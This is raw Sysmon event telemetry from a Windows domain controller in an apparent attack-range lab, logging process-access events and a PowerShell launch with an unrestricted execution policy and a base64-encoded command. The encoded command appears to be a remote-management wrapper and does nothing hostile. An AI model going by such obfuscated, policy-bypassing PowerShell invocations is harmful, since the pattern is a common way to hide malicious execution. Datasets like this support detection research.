10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3E35-5F80-8200-000000007F01}25321324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6bef32a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b393e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6be45466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b354997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3b2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3964cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3964cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b39635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3882e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b393e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6be45466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b37ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b37a232(wow64) 154100x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.326{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E35-5F80-A1DB-040000000000}0x4dba10HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.265{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.265{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.234{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xfnkkwln.0is.ps12020-10-09 10:40:53.234 10341000x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.219{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.203{733EE690-3E35-5F80-8000-000000007F01}50765096C:\Windows\system32\conhost.exe{733EE690-3E35-5F80-8200-000000007F01}2532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.203{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 